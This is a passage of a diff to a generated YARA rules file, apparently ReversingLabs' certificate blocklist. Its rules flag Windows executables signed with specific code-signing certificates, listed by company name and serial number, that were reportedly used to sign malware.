+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4870-L4888"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "fe3a2b906debb3f03e6a403829fca02c751754e9a02442a962c66defb84aed83"
+		logic_hash = "5bb78a5e39f9d023cf63edabdc83d4965fc79f6f04f9fea9bcf2a53223fbd4ca"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21701,21 +44095,21 @@ rule REVERSINGLABS_Cert_Blocklist_5A364C4957D93406F76321C2316F42F0 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Board Game Bucket Ltd" and pe.signatures [ i ] . serial == "5a:36:4c:49:57:d9:34:06:f7:63:21:c2:31:6f:42:f0" and 1661337307 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AntiFIX s.r.o." and ( pe.signatures [ i ] . serial == "00:2c:90:ea:f4:de:3a:fc:03:ba:92:4c:71:94:35:c2:a3" or pe.signatures [ i ] . serial == "2c:90:ea:f4:de:3a:fc:03:ba:92:4c:71:94:35:c2:a3" ) and 1586293430 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_E7E7F7180666546Ce7A8Da32119F5Ce1 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Aff762E907F0644E76Ed8A7485Fb12A1 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8984ac03-2646-54a1-a6d3-4c2cc72806e7"
+		id = "3b3bbbdd-9c2d-5c80-a121-3e3ad13e9ac6"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10898-L10916"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4890-L4908"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "940f6508208998593f309ffeeeda20ab475d427c952a14871b6e58e17d2a4c85"
+		logic_hash = "ad05389e0eb30cb894b03842d213b8c956f66357a913c73d8d8b79f8336bf980"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21725,21 +44119,21 @@ rule REVERSINGLABS_Cert_Blocklist_E7E7F7180666546Ce7A8Da32119F5Ce1 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "C\\xC3\\x94NG TY TNHH PDF SOFTWARE" and ( pe.signatures [ i ] . serial == "00:e7:e7:f7:18:06:66:54:6c:e7:a8:da:32:11:9f:5c:e1" or pe.signatures [ i ] . serial == "e7:e7:f7:18:06:66:54:6c:e7:a8:da:32:11:9f:5c:e1" ) and 1661558399 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Lets Start SP Z O O" and ( pe.signatures [ i ] . serial == "00:af:f7:62:e9:07:f0:64:4e:76:ed:8a:74:85:fb:12:a1" or pe.signatures [ i ] . serial == "af:f7:62:e9:07:f0:64:4e:76:ed:8a:74:85:fb:12:a1" ) and 1594882330 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_062B2827500C5Df35A83F661B3Af5Dd3 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_D8530214Ca0F512946496B5164C61201 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "784c58d9-9a13-5402-867e-c1b144512957"
+		id = "0125a67a-d5e7-5c93-a58c-cacb6d8fa60b"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10918-L10934"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4910-L4928"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "4edc263b08b21428b5f2f4f14f9582c0f96f79cb49fbba563c103bf8bb2037a6"
+		logic_hash = "377962915586c9f5a5737c24b698c96efc2e819e52ee16109c405f9af2d57e7f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21749,21 +44143,21 @@ rule REVERSINGLABS_Cert_Blocklist_062B2827500C5Df35A83F661B3Af5Dd3 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "*.eos.com" and pe.signatures [ i ] . serial == "06:2b:28:27:50:0c:5d:f3:5a:83:f6:61:b3:af:5d:d3" and 1651449600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DJ ONLINE MARKETING LIMITED" and ( pe.signatures [ i ] . serial == "00:d8:53:02:14:ca:0f:51:29:46:49:6b:51:64:c6:12:01" or pe.signatures [ i ] . serial == "d8:53:02:14:ca:0f:51:29:46:49:6b:51:64:c6:12:01" ) and 1595485920 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7Bf27695Fd20B588F2B2F173B6Caf2Ba : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_661Ba8F3C9D1B348413484E9A49502F7 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a3e6923a-f2c4-5d7c-aeab-bdb7fe03c597"
+		id = "a0c501c9-a856-55b6-b845-aeab4db5ab51"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10936-L10952"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4930-L4948"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "94d8739761b6a8ee91550be47432b046609b076aab6e57996de123a0fcaba73e"
+		logic_hash = "4840b311c1e2c0ae14bb2cf6fa8d96ab1a434ceac861db540697f3aed1a6833f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21773,21 +44167,21 @@ rule REVERSINGLABS_Cert_Blocklist_7Bf27695Fd20B588F2B2F173B6Caf2Ba : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Game Warriors Limited" and pe.signatures [ i ] . serial == "7b:f2:76:95:fd:20:b5:88:f2:b2:f1:73:b6:ca:f2:ba" and 1662112800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Unique Digital Services Ltd." and ( pe.signatures [ i ] . serial == "00:66:1b:a8:f3:c9:d1:b3:48:41:34:84:e9:a4:95:02:f7" or pe.signatures [ i ] . serial == "66:1b:a8:f3:c9:d1:b3:48:41:34:84:e9:a4:95:02:f7" ) and 1594942800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1B248C8508042D36Bbd5D92D189C61D8 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_51Aead5A9Ab2D841B449Fa82De3A8A00 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4ad05207-10d1-53c5-8383-a3c71a447ed6"
+		id = "c4909945-f2f1-53b2-b438-edf411fda7ed"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10954-L10970"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4950-L4966"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2c063d0878a8bf6cd637e1dac2cb9164beb52c951e01858a7c3c9c4c1a853f54"
+		logic_hash = "e53095aab9d6c2745125e8cd933334ebc2e51a9725714d31a46baa74b8e42ed9"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21797,21 +44191,21 @@ rule REVERSINGLABS_Cert_Blocklist_1B248C8508042D36Bbd5D92D189C61D8 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Digital Robin Limited" and pe.signatures [ i ] . serial == "1b:24:8c:85:08:04:2d:36:bb:d5:d9:2d:18:9c:61:d8" and 1663171218 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Corsair Software Solution Inc." and pe.signatures [ i ] . serial == "51:ae:ad:5a:9a:b2:d8:41:b4:49:fa:82:de:3a:8a:00" and 1501577475 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_032660Ee1D49Ad35086027473E2614E5E724 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_03B630F9645531F8868Dae8Ac0F8Cfe6 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "29cb9255-0a34-58e8-88b2-fad988c7d229"
+		id = "be945687-9b8c-5d84-9992-fd317eddae54"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10972-L10988"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4968-L4984"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8d1435d2fa70db12cde2f9098e35ca1737f5aac36bac91329b28f03aad090e90"
+		logic_hash = "6d2f4346760bf52a438c4c996e92a2641bebfd536248776383d7c8394e094e6a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21821,21 +44215,21 @@ rule REVERSINGLABS_Cert_Blocklist_032660Ee1D49Ad35086027473E2614E5E724 : INFO FI
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "sunshine.com" and pe.signatures [ i ] . serial == "03:26:60:ee:1d:49:ad:35:08:60:27:47:3e:26:14:e5:e7:24" and 1660238245 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Geksan LLC" and pe.signatures [ i ] . serial == "03:b6:30:f9:64:55:31:f8:86:8d:ae:8a:c0:f8:cf:e6" and 1594252801 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_043052956E1E6Dbd5F6Ae3D8B82Cad2A2Ed8 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6F8373Cf89F1B49138F4328118487F9E : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ac09f8ac-fbdd-5989-a7e7-07373a69213b"
+		id = "80c5d205-7f5e-5e06-b490-f33205154974"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10990-L11006"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4986-L5002"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c29fb109c741437a3739f1c42aadace8f612ef1e3ea90e3e2bdd8a92c85e766a"
+		logic_hash = "f926c2f73d47d463721a0cad48d9866192df55d71867941a40cba7e0b7725102"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21845,21 +44239,21 @@ rule REVERSINGLABS_Cert_Blocklist_043052956E1E6Dbd5F6Ae3D8B82Cad2A2Ed8 : INFO FI
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ok.com" and pe.signatures [ i ] . serial == "04:30:52:95:6e:1e:6d:bd:5f:6a:e3:d8:b8:2c:ad:2a:2e:d8" and 1662149613 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "30 PTY LTD" and pe.signatures [ i ] . serial == "6f:83:73:cf:89:f1:b4:91:38:f4:32:81:18:48:7f:9e" and 1572566400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Dbc03Ca7E6Ae6Db6 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_E38259Cf24Cc702Ce441B683Ad578911 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a5ac5da6-0bb0-5327-ac3a-b53d2f103fe6"
+		id = "fc5df86f-b8c9-58b1-bd41-e03ed50829dd"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11008-L11026"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5004-L5022"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0077b9c46ddd98a4929878ba4ba9476ed7fb1d7bf6e30c3ae0f950445d01e8f3"
+		logic_hash = "2428df14a18f4aed1a3db85c1fb43a847fae8a922c6dc948f3bc514dc4cae09c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21869,21 +44263,21 @@ rule REVERSINGLABS_Cert_Blocklist_Dbc03Ca7E6Ae6Db6 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SPIDER DEVELOPMENTS PTY LTD" and ( pe.signatures [ i ] . serial == "00:db:c0:3c:a7:e6:ae:6d:b6" or pe.signatures [ i ] . serial == "db:c0:3c:a7:e6:ae:6d:b6" ) and 1600826873 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Akhirah Technologies Inc." and ( pe.signatures [ i ] . serial == "00:e3:82:59:cf:24:cc:70:2c:e4:41:b6:83:ad:57:89:11" or pe.signatures [ i ] . serial == "e3:82:59:cf:24:cc:70:2c:e4:41:b6:83:ad:57:89:11" ) and 1597276800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7D27332C3Cb3A382A4Fd232C5C66A2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Bdc81Bc76090Dae0Eee2E1Eb744A4F9A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d8390528-ff27-514d-ab89-fd563a19ce3c"
+		id = "66feefd2-9cec-56fc-a1c1-11004363462d"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11028-L11044"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5024-L5042"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c1c50015db7f97b530819b40e2578463a6021bfff8e2582858a4c3fbd1a9b9bc"
+		logic_hash = "4fc3e57bedb6fb7c96e6a1ee2ad2aec3860716ac714d52ea58b86be4bbda4660"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21893,21 +44287,21 @@ rule REVERSINGLABS_Cert_Blocklist_7D27332C3Cb3A382A4Fd232C5C66A2 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MALVINA RECRUITMENT LIMITED" and pe.signatures [ i ] . serial == "7d:27:33:2c:3c:b3:a3:82:a4:fd:23:2c:5c:66:a2" and 1655424000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALM4U GmbH" and ( pe.signatures [ i ] . serial == "00:bd:c8:1b:c7:60:90:da:e0:ee:e2:e1:eb:74:4a:4f:9a" or pe.signatures [ i ] . serial == "bd:c8:1b:c7:60:90:da:e0:ee:e2:e1:eb:74:4a:4f:9a" ) and 1579824000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_82D224323Efa65060B641F51Fadfef02 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_B2E730B0526F36Faf7D093D48D6D9997 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "166949cf-dbff-5713-950e-46d1f3edc61f"
+		id = "eb82e05b-9aee-5ea7-88a5-8d186b8aafb8"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11046-L11064"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5044-L5062"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "9d361c91ed24b6c20a7b35957e26f208ce8e0a3d79c5a6fed6278acd826ccf49"
+		logic_hash = "f74cc94428d7739abf6ee76f6cbd53aa47cea815a014de0d786fe53b15f66201"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21917,21 +44311,21 @@ rule REVERSINGLABS_Cert_Blocklist_82D224323Efa65060B641F51Fadfef02 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SAVAS INVESTMENTS PTY LTD" and ( pe.signatures [ i ] . serial == "00:82:d2:24:32:3e:fa:65:06:0b:64:1f:51:fa:df:ef:02" or pe.signatures [ i ] . serial == "82:d2:24:32:3e:fa:65:06:0b:64:1f:51:fa:df:ef:02" ) and 1665100800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bamboo Connect s.r.o." and ( pe.signatures [ i ] . serial == "00:b2:e7:30:b0:52:6f:36:fa:f7:d0:93:d4:8d:6d:99:97" or pe.signatures [ i ] . serial == "b2:e7:30:b0:52:6f:36:fa:f7:d0:93:d4:8d:6d:99:97" ) and 1597276800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_890570B6B0E2868A53Be3F8F904A88Ee : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7156Ec47Ef01Ab8359Ef4304E5Af1A05 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "681d233c-d5a2-5f25-bdb9-125149a291c4"
+		id = "b285a407-7f71-5c7e-baae-bfa111a50101"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11066-L11084"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5064-L5080"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "fb7af8ec09da2fecaaaed8c7770966f11ef8a44a131553a9d1412387db2fb7ea"
+		logic_hash = "7bb093287dd309ce12859eca9a9fc98095b3d52ec860626fe6e743bace262fde"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21941,21 +44335,21 @@ rule REVERSINGLABS_Cert_Blocklist_890570B6B0E2868A53Be3F8F904A88Ee : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JESEN LESS d.o.o." and ( pe.signatures [ i ] . serial == "00:89:05:70:b6:b0:e2:86:8a:53:be:3f:8f:90:4a:88:ee" or pe.signatures [ i ] . serial == "89:05:70:b6:b0:e2:86:8a:53:be:3f:8f:90:4a:88:ee" ) and 1636588800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BOREC, OOO" and pe.signatures [ i ] . serial == "71:56:ec:47:ef:01:ab:83:59:ef:43:04:e5:af:1a:05" and 1597363200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2642Fe865F7566Ce3123A5142C207094 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_13794371C052Ec0559E9B492Abb25C26 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "508d9c00-c209-55b2-9a40-b62ff4d866c9"
+		id = "31f119a3-e0da-5875-826f-68c40c6f8b88"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11086-L11102"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5082-L5098"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1ad4adf8b05a6cc065d289e6963480d37a92712a318744a30a16aad22380f238"
+		logic_hash = "7383d1fb1fa6e49f8fa9e1eecfe3fcedb8a11702fbd3700630a11b12da29fedf"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21965,21 +44359,21 @@ rule REVERSINGLABS_Cert_Blocklist_2642Fe865F7566Ce3123A5142C207094 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "C.W.D. INSTAL LTD" and pe.signatures [ i ] . serial == "26:42:fe:86:5f:75:66:ce:31:23:a5:14:2c:20:70:94" and 1666310400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Carmel group LLC" and pe.signatures [ i ] . serial == "13:79:43:71:c0:52:ec:05:59:e9:b4:92:ab:b2:5c:26" and 1599177600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4A2E337Fff23E5B2A1321Ffde56D1759 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_5C7E78F53C31D6Aa5B45De14B47Eb5C4 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e5cae614-eff1-5c3d-a7f6-c41b0a2c412e"
+		id = "5906107a-03ce-5ca4-b0a7-12b0b45359dd"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11104-L11120"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5100-L5116"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "bc2df95ddf1ef3d5f83d14852e1cf6cbf4b71bfbe88fc97c2a4553e8581ddf47"
+		logic_hash = "7521abc5c93f0336af4fab95268962aa3d3fb48fed6a8ba7fdb98e373158b327"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21989,21 +44383,21 @@ rule REVERSINGLABS_Cert_Blocklist_4A2E337Fff23E5B2A1321Ffde56D1759 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Karolina Klimowska" and pe.signatures [ i ] . serial == "4a:2e:33:7f:ff:23:e5:b2:a1:32:1f:fd:e5:6d:17:59" and 1660314070 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cubic Information Systems, UAB" and pe.signatures [ i ] . serial == "5c:7e:78:f5:3c:31:d6:aa:5b:45:de:14:b4:7e:b5:c4" and 1579824000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_92D9B92F8Cf7A1Ba8B2C025Be730C300 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Dadf44E4046372313Ee97B8E394C4079 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "bc37efaa-9ceb-5079-999f-b3d17c585b1c"
+		id = "bebfbbd7-8d42-50a3-8efa-85b641eb069a"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11122-L11140"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5118-L5136"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2a0be6157e589705ad19756971bd865edad2d54760d03c2e6f47a461b402ad68"
+		logic_hash = "170533935b91776ec2413106c55ed4a01c33f32a469a855824cac796f2e132a0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22013,21 +44407,21 @@ rule REVERSINGLABS_Cert_Blocklist_92D9B92F8Cf7A1Ba8B2C025Be730C300 : INFO FILE
 		importance = 25
 
 	condition:
